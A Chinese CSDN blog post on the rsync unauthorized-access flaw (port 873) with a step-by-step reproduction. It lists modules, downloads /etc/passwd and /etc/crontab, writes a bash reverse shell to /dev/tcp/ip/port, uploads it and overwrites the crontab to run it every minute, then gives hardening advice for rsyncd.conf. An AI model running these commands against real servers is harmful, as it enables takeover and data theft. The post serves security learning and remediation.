rsync未授权访问

最新推荐文章于 2024-05-16 08:00:00 发布
最新推荐文章于 2024-05-16 08:00:00 发布
阅读量600 收藏 7
点赞数 8
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135617542
版权
本文详细描述了rsync远程数据同步工具的未授权访问漏洞,包括复现过程、危害以及修复建议,强调了配置文件调整对防止信息泄露和远程命令执行的重要性。
摘要由CSDN通过智能技术生成

漏洞描述:

rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。

rsync未授权访问带来的危害主要有两个:一是造成了严重的信息泄露;二是上传脚本后门文件,远程命令执行。

复现过程:

1.用rsync命令访问目标ip的模块

rsync rsync://ip:port/

2.查看src模块下的文件

rsync rsync://ip:port/src

3.根据文件信息,可以看到src是文件根目录,可以下载任意文件,此处下载/etc/passwd到当前目录

rsync -av rsync://ip:port/src/etc/passwd ./

4.查看下载的文件

cat passwd

5.查看crontab配置文件

rsync rsync://ip:port/src/etc/crontab

6.下载crontab配置文件

rsync -av rsync://ip:port/src/etc/crontab /root/crontab.txt

7.编写shell.sh监听脚本

vim shell.sh
#!/bin/bash

/bin/bash -i >& /dev/tcp/ip/port 0>&1

8.赋予执行权限

chmod +x shell.sh

9.编辑crontab.txt文件并保存退出(每隔1分钟运行一次脚本)

vim /root/crontab.txt
*/1 * * * * root /tmp/shell. sh

10.将shell.sh上传至/tmp/shell.sh

rsync -av shell.sh rsync://ip:port/src/tmp/shell.sh

11.将crontab.txt文件上传到目标服务器

rsync -av /root/crontab.txt rsync://ip:port/src/etc/crontab

12.本地监听

13.成功反弹shell

借此漏洞,攻击者可以获取服务器敏感信息,并向服务器上传恶意脚本文件,远程命令执行。

修复建议:

更改配置文件/etc/rsyncd.conf,添加或修改参数:

1.访问控制,设置host allow,限制访问主机IP;

2.权限控制,设置read only=yes,模块设置为只读;

3.访问认证,设置auth、secrets,认证成功才能调用服务;

4.模块隐藏,设置list,将模块隐藏起来。

慕筱蚺
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rsync 授权访问漏洞
weixin_59086772的博客
12-28 7350
雨笋教育小编来分享干货了,感兴趣的可以一同探讨。 0x00前言 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 0x01漏洞原理 rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 0x02漏洞危害 rsync授权访问会造成严重的信息泄露,攻击者可以上传脚本后门文件,远程命令执行。 0x03环境搭建 docker-compose.yml version: '2' s
每日漏洞 | rsync授权访问
03-12 3789
每日漏洞 | rsync授权访问
授权访问Rsync 授权访问漏洞
qq_68163788的博客
05-16 472
Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。 Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
rsync授权访问漏洞利用复现
技术超强的网络安全平台
05-07 1095
一、Rsync简介Rsync是Linux下一款数据备份工具,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。同时支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员。其中rsync协议默认监听873端口,而一般开发人员安全意识薄弱的情况下,如果目标开启了rsync服务,并且没有配置ACL或访问密码,而rsync默认是root权限,我们将可以读写目标服务器文件。二、利用条件rsync默认允许匿名访问,也可在其配置文件中为同
服务安全-应用协议rsync授权&ssh漏洞复现
rumil的博客
10-16 1334
libssh是一个在客户端和服务器端实现SSHv2协议的多平台C库。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配 置ACL或访问密码,我们将可以读写目标服务器文件。OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令。rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。
【漏洞复现-rsync-授权访问】vulfocus/rsync-common
10-16 1210
rsync-授权访问
rsync rpm安装包
09-07
rsync rpm安装包
rsync
01-20
Rsync 一款快速增量备份工具 支持远程同步,支持上传和下载 命令: Rsync [选项] 原始位置 目标位置 -a:归档模式,递归并保留对象属性,等同于 -rlptgoD -v:显示同步过程的详细(verbose)信息 -z:在传输文件时...
rsync的核心算法
01-31
rsync中一项与其他大部分类似程序或协定中所见的重要特性是镜像是只对有变更的部分进行传送。rsync可拷贝/显示目录属性,以及拷贝文件,并可选择性的压缩以及递归拷贝。rsync利用由Andrew Tridgell发明的算法。...
Git附件rsync打包文件
最新发布
06-01
如需最新rsync支持 可前往网站 https://repo.msys2.org/msys/x86_64/ 更新下载 rsync-3.3.0-1-x86_64.pkg.tar.zs t和它的签名文件,用于验证。rsync-3.3.0-1-x86_64.pkg.tar.zst.sig libxxhash-0.8.2-1-x86_64.pkg....
rsync结合find技巧分享
01-20
rsync -avpz -e ssh 192.... 您可能感兴趣的文章:rsync命令排除文件和文件夹(exclude-from)RSync实现文件同步备份配置详解Rsync命令参数详解rsync 安装使用详解rsync 常见错误与解决方法整理rsync详解之exclude排除文件
授权和代码执行漏洞特征和检测方法
wutiangui的博客
10-13 1017
查看在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件,若存在fastjson-1.2.*.**.jar格式的jar文件,或者抓包发现被测应用系统的响应报文中包含“com.alibaba.fastjson”字符串,则需检测是否存在fastjson反序列化漏洞。s=captcha,若响应包中包含phpinfo信息,则说明存在代码执行漏洞。依次修改URL末尾的端口号为常见的22,80,443,7001,8080等端口,若页面中根据端口号不同出现如下字符串,说明存在SSRF漏洞。
rsync授权访问漏洞利用
weixin_47493074的博客
10-05 746
rsync授权访问漏洞利用
【权限提升】Linux系统&Docker挂载&Rsync授权&Sudo-CVE&Polkit-CVE
今天是几号的博客
03-05 446
v将容器外部的目录/root(其他目录也可以) 挂载到容器内部/mnt,使用-it参数进入容器shell。如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等。管理员将真实物理机/root目录挂载到容器内部/mnt中,-it参数进入容器shell,补充:拿到普通用户权限后,并且该用户在docker中,意思就是可以控制docker服务。-复现:创建用户归类目录,添加到docker组。sudoedit -s / 报错 则存在。-利用:普通本地用户权限。
Rsync授权访问 getshell——漏洞复现
W小哥
11-09 3619
一、 Rsync授权访问漏洞介绍 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 二、靶场搭建 靶机: ubuntu IP: 192.168.241.142 攻击机: kali IP: 192.168.241.128 直接使用 vluhub 环境了 cd rsync/common docker-compose build docke
linux rsync 漏洞修复,每日漏洞 | rsync授权访问
weixin_39680121的博客
05-16 434
01漏洞描述rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可授权访问rsync,上传本地文件,下载服务器文件。rsync授权访问带来的危害主要有两个:一是造成了严重的信息泄露;二是上传脚本后门文件,远程命令执行。02漏洞检测rsync授权访问漏洞只需使用rsync命令即可进行检测...
Rsync授权访问
浅笑996的博客
11-19 5167
1.漏洞名称 Rsync 授权访问漏洞 2.漏洞原理 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或 访问密码,我们将可以读写目标服务器文件。 3.漏洞利用 vulhub环境靶机 : 192.168.91.130 攻击机:kali 192.168.91.128...
rsync 漏洞利用工具
08-15
- *1* *2* [Rsync授权访问 getshell——漏洞复现](https://blog.csdn.net/weixin_40412037/article/details/121165743)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值